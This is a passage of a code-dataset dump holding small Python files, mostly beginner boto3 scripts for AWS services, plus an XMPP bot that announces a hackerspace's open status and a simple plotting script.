"text": "import boto3\n\n# Get the service resource\nsqs = boto3.resource('sqs')\nqueue = sqs.get_queue_by_name(QueueName='test') \n\nresponse = queue.send_messages(Entries=[\n {\n 'Id': '1',\n 'MessageBody': 'Hello World Here I come'\n },\n {\n 'Id': '2',\n 'MessageBody': 'MyQueueMessage',\n 'MessageAttributes': {\n 'Author': {\n 'StringValue': 'Suresh',\n 'DataType': 'String'\n }\n }\n }\n])"
},
{
"alpha_fraction": 0.6698841452598572,
"alphanum_fraction": 0.6988416910171509,
"avg_line_length": 24.950000762939453,
"blob_id": "525d0e60c6c7e2146f54f2f0e3aaf3891382eca4",
"content_id": "c1c63e271a14dbe79583a2bae58e23230f30fdb2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 20,
"path": "/s3example.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\ns3 = boto3.resource('s3')\nbucket = s3.buckets.all()\nfor b in s3.buckets.all():\n\tprint(b.name)\nfor b in s3.buckets.all():\n\tprint(b.name)\n\tprint(b.creation_date)\ncli = boto3.client('s3')\nfor b in s3.buckets.all():\n\tbucketName = b.name\n\tresponse = cli.list_objects(Bucket=bucketName)\nkeyName1 = response['Contents'][0]['Key']\ncli.delete_object(Bucket=bucketName,Key=keyName1)\nKeyObjects = response['Contents']\ni = 0\nwhile i < len(KeyObjects):\n\tfor e in KeyObjects[i]:\n\t\tprint(e,\":\",KeyObjects[i][e])\n\ti = i+1"
},
{
"alpha_fraction": 0.48847925662994385,
"alphanum_fraction": 0.5299538969993591,
"avg_line_length": 23.22222137451172,
"blob_id": "42bb6d4d5f9fa2559f4c9506dfe489fdd0df9f09",
"content_id": "74727cc75a87599ca97f844a1d291734729e20b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 217,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 9,
"path": "/runinstance.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\nclient = boto3.client('ec2')\n\nreservation = client.run_instances(\n ImageId='ami-9ff7e8af',\n InstanceType='t2.micro',\n MinCount=1, MaxCount=1,\n )"
},
{
"alpha_fraction": 0.5864958167076111,
"alphanum_fraction": 0.5943814516067505,
"avg_line_length": 30.238094329833984,
"blob_id": "e55f52a17afbbe5c350c31816fa0ce861520c91e",
"content_id": "73a0dc80eed91c1df5cbed623050000c65a78775",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2029,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 63,
"path": "/kinesisOps.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\r\nimport json\r\nimport time\r\n\r\n#kinesis_stream = boto3.client('kinesis')\r\n\r\n#response = kinesis_stream.create_stream(\r\n#\t StreamName = 'CloudSiksha',\r\n#\t ShardCount = 1)\r\n\r\ndef put_stream(stream_name, my_data, partition_key):\r\n\tkinesis_client = boto3.client('kinesis')\r\n\r\n\tresponse = kinesis_client.put_record(\r\n\t\t StreamName = stream_name,\r\n\t\t Data = my_data,\r\n\t\t PartitionKey = partition_key)\r\n\treturn response\r\n\r\nmy_streamname = 'CloudSiksha'\r\nmy_partition_key = 'aa'\r\n#i = 0\r\n#while i < 50:\r\n# data = \"Hello\"+str(i)\r\n# my_struct = {\"Key\":data}\r\n# my_input_data = json.dumps(my_struct)\r\n# i = i+1\r\n\r\n # response = put_stream(my_streamname,my_input_data,my_partition_key)\r\n # print(response)\r\n\r\ndef get_stream(my_stream_name):\r\n\r\n\tkinesis_client = boto3.client('kinesis')\r\n\r\n\tresponse = kinesis_client.describe_stream(StreamName = my_stream_name)\r\n\tprint(response)\r\n\r\n\tmy_shard_id = response['StreamDescription']['Shards'][0]['ShardId']\r\n\tstarting_sequence_number = response['StreamDescription']['Shards'][0]['SequenceNumberRange']['StartingSequenceNumber']\r\n\r\n\tshard_iterator = kinesis_client.get_shard_iterator(StreamName=my_stream_name,\r\n ShardId=my_shard_id,\r\n ShardIteratorType='TRIM_HORIZON')\r\n #StartingSequenceNumber = starting_sequence_number)\r\n\r\n\tmy_shard_iterator = shard_iterator['ShardIterator']\r\n\r\n\tread_response = kinesis_client.get_records(ShardIterator=my_shard_iterator,\r\n Limit=10)\r\n\r\n\twhile 'NextShardIterator' in read_response:\r\n\t\tread_response = kinesis_client.get_records(ShardIterator=read_response['NextShardIterator'],\r\n Limit=10)\r\n\r\n\t\tprint(read_response['Records'])\r\n\t\tif not read_response['Records']:\r\n\t\t\tbreak\r\n\r\n\t\ttime.sleep(5)\r\n\r\n\r\nget_stream(my_streamname)"
},
{
"alpha_fraction": 0.5493197441101074,
"alphanum_fraction": 0.5935373902320862,
"avg_line_length": 22.559999465942383,
"blob_id": "5e626c03a15a87c44f10013198e0622e2c1e21a1",
"content_id": "42f9589afe41d1d527a364e3cc3d66e248ebe625",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 588,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 25,
"path": "/aetalarm.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\nclient = boto3.client('cloudwatch')\n\nresponse = client.put_metric_alarm(\\\n AlarmName='LowCPU',\\\n AlarmDescription='Low CPU Alarm',\\\n ActionsEnabled=True,\\\n AlarmActions=[\\\n 'arn:aws:sns:us-west-2:033578524086:CPULow',\\\n ],\\\n MetricName='CPUUtilization',\\\n Namespace='AWS/EC2',\\\n Statistic='Average',\\\n Dimensions=[\\\n {\\\n 'Name': 'InstanceId',\\\n 'Value': 'i-5c2bca85'\\\n },\\\n],\\\n Period=300,\\\n Unit='Percent',\\\n EvaluationPeriods=1,\\\n Threshold=70,\\\n ComparisonOperator='LessThanThreshold'\\\n)"
},
{
"alpha_fraction": 0.6043956279754639,
"alphanum_fraction": 0.7252747416496277,
"avg_line_length": 14.333333015441895,
"blob_id": "ba47a1d687a630d3e6af1695ad21ea952550e474",
"content_id": "bb5c452afaa227b4b3289f38883807a46d2a33c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/s3bucketcreate.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\ns3 = boto3.resource('s3')\nbucket = s3.Bucket('suresh030201')\n\nbucket.create()"
},
{
"alpha_fraction": 0.5972994565963745,
"alphanum_fraction": 0.6282764077186584,
"avg_line_length": 19.655736923217773,
"blob_id": "95e2ce07fe0ed1ef59ffe1c806f2b10da946b789",
"content_id": "9fbc03fb10980301884595c180e2cebd5edb3a84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1259,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 61,
"path": "/e2instancewithpasswd.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto\nconn = EC2Connection()\ngroup_name = 'CloudSiksha'\ndescription = 'CloudSiksha: Test Security Group.'\n \ngroup = conn.create_security_group(\n group_name, description\n)\n \ngroup.authorize('tcp', 8888,8888, '<a href=\"http://0.0.0.0/0\">0.0.0.0/0</a>')\nimport random\nfrom string import ascii_lowercase as letters\n \n# Create the random data in the right format\ndata = random.choice(('UK', 'US'))\nfor a in range(4):\n data += '|'\n for b in range(8):\n data += random.choice(letters)\nimport hashlib\n \n# Your chosen password goes here\npassword = 'password'\n \nh = hashlib.new('sha1')\nsalt = ('%0' + str(12) + 'x') % random.getrandbits(48)\nh.update(password + salt)\n \npassword = ':'.join(('sha1', salt, h.hexdigest()))\n\ndata += '|' + password\n\n# NotebookCloud AMI\nAMI = 'ami-affe51c6'\n \nconn.run_instances(\n AMI,\n instance_type = 't1.micro',\n security_groups = ['python_central'],\n user_data = data,\n max_count = 1\n)\n\nimport time\n \nwhile True:\n inst = [\n i for r in conn.get_all_instances()\n for i in r.instances\n ][0]\n \ndns = inst.__dict__['public_dns_name']\n \nif dns:\n # We want this instance id for later\n instance_id = i.__dict__['id']\n break\n \ntime.sleep(5)\n\nprint('https://{}:8888'.format(dns))"
},
{
"alpha_fraction": 0.5052316784858704,
"alphanum_fraction": 0.5874439477920532,
"avg_line_length": 21.33333396911621,
"blob_id": "04b44ce49ac19cddda30c2cf4bab9cf8a3a47fa9",
"content_id": "7bbd989615408b948bf324b358c479bd67311843",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 669,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 30,
"path": "/snspolicy.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\nclient = boto3.client('sns')\nsns = boto3.resource('sns')\ntopic = sns.Topic(\"arn:aws:sns:us-west-2:033578524086:NewTopic\")\n\nresponse = client.set_topic_attributes(\n\tTopicArn=\"arn:aws:sns:us-west-2:033578524086:NewTopic\",\n\tAttributeName='Policy',\n\tAttributeValue='{\\\n \"Version\": \"2008-10-17\",\\\n \"Id\": \"example-ID\",\\\n \"Statement\": [\\\n {\\\n \"Sid\": \"example-statement-ID\",\\\n \"Effect\": \"Allow\",\\\n \"Principal\": {\\\n \"AWS\":\"*\"\\\n },\\\n \"Action\": [\\\n \"SNS:Publish\"\\\n ],\\\n \"Resource\": \"arn:aws:sns:us-west-2:033578524086:NewTopic\",\\\n \"Condition\": {\\\n \"ArnLike\": {\\\n \"aws:SourceArn\": \"arn:aws:s3:*:*:suresh0302\"\\\n }\\\n }\\\n }\\\n ]\\\n}')"
},
{
"alpha_fraction": 0.5436893105506897,
"alphanum_fraction": 0.6504854559898376,
"avg_line_length": 19.600000381469727,
"blob_id": "64918077486d6b8257946128cbc24a62179cb817",
"content_id": "c9fc2411e30a2ff6ec5d9eb067a4064f98a0823f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 5,
"path": "/s3upload.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\ns3 = boto3.resource('s3')\n\ns3.Object('suresh0302', 's3.py').put(Body=open('s3.py','rb'))\n"
},
{
"alpha_fraction": 0.6265060305595398,
"alphanum_fraction": 0.6867470145225525,
"avg_line_length": 15.399999618530273,
"blob_id": "6107d2a4ad1c934ae775c126aa8a2721f2927d68",
"content_id": "5a362cef10d29e1f78a8c05496d46813ccf47656",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 83,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 5,
"path": "/describeinstances.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\nec2 = boto3.resource('ec2')\n\nfor e in ec2.instances.all():\n\tprint(e)\n\n"
},
{
"alpha_fraction": 0.7124394178390503,
"alphanum_fraction": 0.7205169796943665,
"avg_line_length": 31.63157844543457,
"blob_id": "3b24eca2cc924d1b05a426d8d75549937bf7e3bc",
"content_id": "f1c6cc245c7b4c822e1a9499410b4180d2811a3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 19,
"path": "/readingmsgq2.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\n# Get the service resource\nsqs = boto3.resource('sqs')\nqueue = sqs.get_queue_by_name(QueueName='test') \n\nmessage = queue.receive_messages(MessageAttributeNames=['Author'])\n# Get the custom author message attribute if it was set\nauthor_text = ''\nif message.message_attributes is not None:\n author_name = message.message_attributes.get('Author').get('StringValue')\nif author_name:\n author_text = ' ({0})'.format(author_name)\n\n # Print out the body and author (if set)\nprint('Hello, {0}!{1}'.format(message.body, author_text))\n\n # Let the queue know that the message is processed\nmessage.delete()"
},
{
"alpha_fraction": 0.6136363744735718,
"alphanum_fraction": 0.6515151262283325,
"avg_line_length": 18,
"blob_id": "c3126d2b0a12746c50c834f337e288e2c5ba95bf",
"content_id": "c3792d0709451dcedf3db436a61cae93937debce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 132,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 7,
"path": "/s3print.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\ns3 = boto3.resource('s3')\n\nfor bucket in s3.buckets.all():\n for obj in bucket.objects.all():\n print(obj.key)"
},
{
"alpha_fraction": 0.28371089696884155,
"alphanum_fraction": 0.3360302150249481,
"avg_line_length": 25.884057998657227,
"blob_id": "0e4dffd09c7a352ef54bcce1d01687bf3d2c8c48",
"content_id": "67e771cdf5639c5f9432f05a09a21bb2072d4bf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1854,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 69,
"path": "/putmetric.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\nfrom datetime import datetime\nclient = boto3.client('cloudwatch')\n\nresponse = client.put_metric_data(\\\n Namespace='Mem',\\\n MetricData=[\\\n {\\\n 'MetricName': 'Memory',\\\n 'Dimensions': [\\\n {\n 'Name': 'InstanceId',\\\n 'Value': 'i-5c2bca85'\\\n },\\\n ],\\\n 'Timestamp': datetime(2016,5,20,00,00,00),\\\n 'Value': 60,\\\n 'Unit': 'Percent'\\\n },\\\n\t {\\\n 'MetricName': 'Memory',\\\n 'Dimensions': [\\\n {\n 'Name': 'InstanceId',\\\n 'Value': 'i-5c2bca85'\\\n },\\\n ],\\\n 'Timestamp': datetime(2016,5,20,00,10,00),\\\n 'Value': 70,\\\n 'Unit': 'Percent'\\\n },\\\n\t {\\\n 'MetricName': 'Memory',\\\n 'Dimensions': [\\\n {\n 'Name': 'InstanceId',\\\n 'Value': 'i-5c2bca85'\\\n },\\\n ],\\\n 'Timestamp': datetime(2016,5,20,00,20,00),\\\n 'Value': 40,\\\n 'Unit': 'Percent'\\\n },\\\n\t {\\\n 'MetricName': 'Memory',\\\n 'Dimensions': [\\\n {\n 'Name': 'InstanceId',\\\n 'Value': 'i-5c2bca85'\\\n },\\\n ],\\\n 'Timestamp': datetime(2016,5,20,00,30,00),\\\n 'Value': 50,\\\n 'Unit': 'Percent'\\\n },\\\n\t {\\\n 'MetricName': 'Memory',\\\n 'Dimensions': [\\\n {\n 'Name': 'InstanceId',\\\n 'Value': 'i-5c2bca85'\\\n },\\\n ],\\\n 'Timestamp': datetime(2016,5,20,00,40,00),\\\n 'Value': 70,\\\n 'Unit': 'Percent'\\\n },\\\n ]\\\n)\\"
}
] | 22 |
jseabold/hackathon | https://github.com/jseabold/hackathon | db754660ea282a1f196704df9ac467992e70ad2f | 4dc65e31be91d44b2cd59e0172debc188c5fbf3e | d26a89977aaa934556d7f6e3444b80e58b49269a | refs/heads/master | 2016-08-06T07:09:27.469388 | 2012-05-14T21:45:27 | 2012-05-14T21:45:27 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6165643930435181,
"alphanum_fraction": 0.6349693536758423,
"avg_line_length": 20.600000381469727,
"blob_id": "11dd0d30e128aa0d72d1e899f03caed91bab346d",
"content_id": "3664124df23793135d518e595e8839122f0c52b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 326,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 15,
"path": "/getdata.py",
"repo_name": "jseabold/hackathon",
"src_encoding": "UTF-8",
"text": "from urllib2 import urlopen\nimport os\nimport zipfile\n\nurl = \"http://eagle1.american.edu/~js2796a/kaggle_epa_data.tar.gz\"\nfname = 'kaggle_epa_data.tar.gz'\n\nf_data = urlopen(url)\n\nwith open(fname, 'w') as fout:\n while True:\n packet = f_data.read()\n if not packet:\n break\n fout.write(packet)\n\n\n"
},
{
"alpha_fraction": 0.6843052506446838,
"alphanum_fraction": 0.6875450015068054,
"avg_line_length": 30.90804672241211,
"blob_id": "5f46b4e23936d6c94355023db559996178252580",
"content_id": "a351450e3834c004a706080a4d96d85851d9ae4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2778,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 87,
"path": "/diagnostics.py",
"repo_name": "jseabold/hackathon",
"src_encoding": "UTF-8",
"text": "\"\"\"\nLet's have a look at the data. We want to plot the targets unconditionally\nto get an idea of what the Series look like.\n\"\"\"\nimport numpy as np\nimport pandas\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\n\ntrain = pandas.read_csv('data/TrainingData.csv')\n\n##############################################################\n### Just some messing around and getting a sense of things ###\n\n#Why did I think looking at the range of temperatures would be interesting?\n#temp_diff = train.filter(regex='Ambient\\.Max.').values - \\\n # train.filter(regex='Ambient\\.Min.').values\n\n#temp_diff = pandas.DataFrame(temp_diff, columns=train.filter(regex='Ambient\\.Max').columns)\n#temp_diff = temp_diff.join(train[['chunkID','position_within_chunk',\n# 'month_most_common', 'hour']])\n\n#temp_groups = temp_diff.groupby('month_most_common')\n# let's aggregate them first and see what the in month variances are\ntemp = train.filter(regex='Ambient\\.Max.').join(train['month_most_common'])\ntemp_groups = temp.groupby('month_most_common')\n# chicago's not that cold...\ntemp_groups.aggregate(np.mean)\n# probably should do t-tests, but seriously, they're not that different\n# variance across sites in a given month\ntemp_groups.aggregate(np.mean).var(1)\n\n\n\n##### Now let's look at the endogenous variable #####\n\ntargets = train.filter(regex='^target')\n\n# targets are arranged in chunks so let's take one target at a time\n# and look at the chunks as different series if it's not too noisy\n\n#for target in targets:\n# target\n\n\n# try it out here\ntarget = targets['target_1_57']\n\n# identifying info back in\ntarget.name = 'target'\ntarget = train[['chunkID', 'position_within_chunk']].join(target)\n\ngrp_target = target.groupby('chunkID')\n\n# do lots and lots of plots to see what this data looks like?\n#for i, grp in grp_target:\n# if not np.all(grp.target.isnull()):\n# grp.target.plot()\n# plt.show()\n\n# grab one and see what the statistics are like\ngrp = grp_target.get_group(1)\n# MA(q) has negligible ACF after qth term\nplt.bar(np.arange(41), sm.tsa.acf(grp.target.fillna().values))\n# AR(p) has negligible PACF after pth term\nplt.bar(np.arange(41), sm.tsa.pacf(grp.target.fillna()))\n\n# unit root? ... maybe\nsm.tsa.stattools.adfuller(grp.target.fillna().values)\n\n# in first difference? ... not a chance\nsm.tsa.stattools.adfuller(grp.target.fillna().diff().dropna().values)\n\nkde = sm.nonparametric.KDE(grp.target.fillna())\nkde.fit()\nplt.plot(kde.support, kde.density)\n\n# looks log-normal\n# so log it, they are concentrations...\nkde = sm.nonparametric.KDE(np.log(grp.target.fillna()))\nkde.fit()\nplt.plot(kde.support, kde.density)\n\n# now it looks bi-modal, might be bw issue\n\nplt.plot(np.log(grp.target.fillna()))\nplt.show()\n\n\n"
},
{
"alpha_fraction": 0.6523216366767883,
"alphanum_fraction": 0.6613816618919373,
"avg_line_length": 27.45161247253418,
"blob_id": "5c0c1ba6201c9ba6bb7588dfa289becfcaef7ac2",
"content_id": "d90ed068e116bb3b9abdb5261909ed0209c8c338",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 883,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 31,
"path": "/arima.py",
"repo_name": "jseabold/hackathon",
"src_encoding": "UTF-8",
"text": "#NOTE: the doMC and foreach in R just parallelize the for loops\n# we could use IPython, we could use multicore, we could use joblib...\n\nimport pandas\nimport statmodels.api as sm\n\ntrain = pandas.read_csv('data/TrainingData.csv')\nsubmit = pandas.read_csv('data/SubmissionZerosExceptNAs.csv')\n\nmedians = train.median()\nmins = train.min()\nmaxes <- train.max()\n\ndef prediction_old(data, varname):\n #fallback = np.ones(72.) * medians[varname]\n # have some creative fallback position\n if data.count(numeric_only=True): < 48:\n return fallback\n\n # this won't set values\n data.ix[data <= 0] = data.ix[data > 0]\n try:\n target = log(data) # log(na.trim(data, 'left'))\n except, err:\n return fallback\n\ndef model(data, varname):\n \"\"\"\n For each target, do prediction with ARMAX model.\n \"\"\"\n arma = sm.tsa.ARMA(data).fit(order=(1,1), trend='c')\n\n"
}
] | 3 |
frlan/spacebot | https://github.com/frlan/spacebot | 37c95b0174fe0ef6d6313176a9b04951fd4b33e7 | 4a98e35a0dcee5a205c971b2b5940250f1454bac | 9fdad6b533ffca9f063243868fcef0a31960b4c8 | refs/heads/master | 2020-05-31T12:32:52.435911 | 2017-02-24T18:13:16 | 2017-02-24T18:13:16 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5939886569976807,
"alphanum_fraction": 0.6011332869529724,
"avg_line_length": 27.58450698852539,
"blob_id": "98e7e5797076a60ee0ce28ced7b11ce82fe51e5d",
"content_id": "b87ae0fda4f16d0f7853325f68e444601cdb3569",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4059,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 142,
"path": "/src/spacebot.py",
"repo_name": "frlan/spacebot",
"src_encoding": "UTF-8",
"text": "import cgi\nfrom BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler\nimport os\nimport os.path\nfrom threading import Thread\nfrom ConfigParser import ConfigParser\nfrom jabberbot import JabberBot, botcmd\nfrom threading import Thread\nimport threading\nfrom Queue import Empty, Queue\nfrom exceptions import Exception\nimport logging\nimport time\n\ndef touch(fname):\n open(fname, 'a').close()\n os.utime(fname, None)\n\n\nclass SpaceApiHandler(BaseHTTPRequestHandler):\n\n def do_POST(self):\n global spacebot\n print 'POST' \n form = cgi.FieldStorage(\n fp=self.rfile,\n headers=self.headers,\n environ={'REQUEST_METHOD':'POST',\n 'CONTENT_TYPE':self.headers['Content-Type'],\n })\n status = form.getvalue('status')\n spacebot.spacebotstatus.update(status) \n self.respond(\"\"\"asdf\"\"\")\n\n def do_GET(self):\n self.respond(\"\"\"geh weg\"\"\")\n\n def respond(self, response, status=200):\n self.send_response(status)\n self.send_header(\"Content-type\", \"text/html\")\n self.send_header(\"Content-length\", len(response))\n self.end_headers()\n self.wfile.write(response)\n\n\n\nclass SpaceBot(JabberBot):\n\n PING_FREQUENCY = 60 # XMPP Ping every X seconds\n PING_TIMEOUT = 2 # Ping timeout\n\n def __init__(self, chatroom, *args, **kargs):\n logging.debug('SpaceBot initialized')\n super(SpaceBot, self).__init__(*args, **kargs)\n self.spacebotstatus = SpaceBotStatus(self)\n self.chatroom = chatroom\n self.messages = Queue()\n\n def idle_proc(self):\n try:\n message = self.messages.get_nowait()\n except Empty:\n return super(SpaceBot, self).idle_proc()\n logging.info('send message {} to chatroom {}'.format(\n message, self.chatroom))\n #self.send(self.chatroom, message, message_type='groupchat')\n self.broadcast(message)\n\n def serve_forever(self):\n self.conn = None\n self._JabberBot__finished = False\n super(SpaceBot, self).serve_forever()\n\n def say(self, message):\n self.messages.put(message)\n\n @botcmd\n def status(self, mess, args):\n \"\"\"Status of the hackspace\"\"\"\n return \"Der Space ist im Moment {}\".format(\n \"offen\" if self.spacebotstatus.spaceopen else \"zu\")\n\n @botcmd\n def more(self, mess, args):\n \"\"\"More about Terminal.21\"\"\"\n return \"\"\"More infos @\n web:\\thttp://www.terminal21.de\n mail:\\[email protected]\n phone:\\t+49 345 23909940\n jabber muc:\\[email protected]\"\"\"\n\n\n\n\nclass SpaceBotStatus(object):\n current_status = 'closed'\n spaceopen = False\n\n def __init__(self, bot):\n self.listener = bot\n if os.path.isfile('spaceopen'):\n self.current_status = 'open'\n self.spaceopen = True\n\n def update(self, status):\n if status != self.current_status:\n if 'open' in status:\n self.spaceopen = True\n touch('spaceopen')\n else:\n self.spaceopen = False\n os.unlink('spaceopen')\n self.notify()\n self.current_status = status\n\n def notify(self):\n self.listener.say('Der Space ist jetzt {}'.format(\n 'offen' if self.spaceopen else 'zu'))\n\n\n\ndef run():\n global spacebot\n logformat = \"%(asctime)s %(levelname)s [%(name)s][%(threadName)s] %(message)s\"\n logging.basicConfig(format=logformat, level=logging.DEBUG)\n\n config = ConfigParser()\n config.read('etc/spacebot.ini')\n\n username = config.get('spacebot', 'username')\n password = config.get('spacebot', 'password')\n chatroom = config.get('spacebot', 'chatroom')\n\n spacebot = SpaceBot(chatroom, username, password)\n server = HTTPServer(('', 8889), SpaceApiHandler)\n thread = threading.Thread(target=server.serve_forever)\n thread.daemon = True\n thread.start()\n\n while True:\n spacebot.serve_forever()\n time.sleep(20)\n"
},
{
"alpha_fraction": 0.4444444477558136,
"alphanum_fraction": 0.4444444477558136,
"avg_line_length": 8,
"blob_id": "f62726b1e3bd1769caaf03777ec31eb1b431704e",
"content_id": "b7dad2275a0b3492fbd0006d06db912405f600ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 18,
"license_type": "no_license",
"max_line_length": 8,
"num_lines": 2,
"path": "/README.md",
"repo_name": "frlan/spacebot",
"src_encoding": "UTF-8",
"text": "spacebot\n========\n"
}
] | 2 |
10000roots/ml-sample | https://github.com/10000roots/ml-sample | a0641c9ddfc40d7bce684b25b811874e9f959c55 | 3e49d67aa99e1738a60af19fc4080eed13a2f943 | 1351b1887ebbea2b11f58fff9cd67fa2f1582db9 | refs/heads/main | 2023-07-26T17:28:33.301242 | 2021-09-07T07:07:28 | 2021-09-07T07:07:28 | 403,876,932 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6379310488700867,
"alphanum_fraction": 0.6551724076271057,
"avg_line_length": 22.200000762939453,
"blob_id": "b2d3ba1c9127d698c375ffe1a45db9a6bf0e9c96",
"content_id": "f5e5689c65443dd47c7d042d93638c23abc29d93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 5,
"path": "/env/bin/pydoc3.9",
"repo_name": "10000roots/ml-sample",
"src_encoding": "UTF-8",
"text": "#!/Users/mlee/development/sample_project/env/bin/python3.9\n\nimport pydoc\nif __name__ == '__main__':\n pydoc.cli()\n"
},
{
"alpha_fraction": 0.6641221642494202,
"alphanum_fraction": 0.6793892979621887,
"avg_line_length": 25.200000762939453,
"blob_id": "5ae54d69605a11ef01cde40b8cc944807d9ce845",
"content_id": "122f6815eb733f4929d50b2fb0f7cdd2e0a39985",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 131,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 5,
"path": "/env/bin/idle3.9",
"repo_name": "10000roots/ml-sample",
"src_encoding": "UTF-8",
"text": "#!/Users/mlee/development/sample_project/env/bin/python3.9\n\nfrom idlelib.pyshell import main\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7819548845291138,
"avg_line_length": 25.600000381469727,
"blob_id": "5bae6a9286724ef75ada64270f5f8842b6de9665",
"content_id": "bf9beb244a78d21f53e5a1367e0fed82333214e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 133,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 5,
"path": "/env/bin/2to3-3.9",
"repo_name": "10000roots/ml-sample",
"src_encoding": "UTF-8",
"text": "#!/Users/mlee/development/sample_project/env/bin/python3.9\nimport sys\nfrom lib2to3.main import main\n\nsys.exit(main(\"lib2to3.fixes\"))\n"
}
] | 3 |
ansko/cpp_dpd_analyzers | https://github.com/ansko/cpp_dpd_analyzers | c2c00dbacadb9cbf2eafbfe8c2e9c97a53621ab0 | 3b9f9e1c5c6cb7b5039a3c8ff540c471df6fb367 | 9552eee31183b68c32cf1a049140deb210a22303 | refs/heads/master | 2020-06-13T16:12:15.647925 | 2019-08-06T12:37:00 | 2019-08-06T12:37:00 | 194,706,111 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4277620315551758,
"alphanum_fraction": 0.6189801692962646,
"avg_line_length": 16.219512939453125,
"blob_id": "ccdd970a10bf127266990c349b5b0deab08389b6",
"content_id": "a9f865ea1074d6f73113ae0568c90df4f029ced1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 706,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 41,
"path": "/plot_two_rows.py",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport sys\n\n\n'''\n1 26.9815\n2 24.305\n3 28.0855\n4 15.9994\n5 15.9994\n6 15.9994\n7 15.9994\n8 1.00797\n9 14.0067\n10 12.0112\n11 12.0112\n12 1.00797\n13 1.00797\n14 12.0112\n15 15.9994\n16 14.0067\n17 14.0067\n'''\n\nif __name__ == '__main__':\n fname = sys.argv[1]\n\n xlabel = '1 from ' + fname\n ylabel = '2 from ' + fname\n out_fname = fname + '.pdf'\n\n lines = open(fname).readlines()\n xs = [float(line.split()[0]) for line in lines]\n ys = [float(line.split()[1]) for line in lines]\n plotted_lines = [plt.plot(xs, ys, 'k', linewidth=1)]\n\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n #plt.gca().set_xlim([0, 10])\n plt.savefig(out_fname)\n"
},
{
"alpha_fraction": 0.4695945978164673,
"alphanum_fraction": 0.5292792916297913,
"avg_line_length": 33.153846740722656,
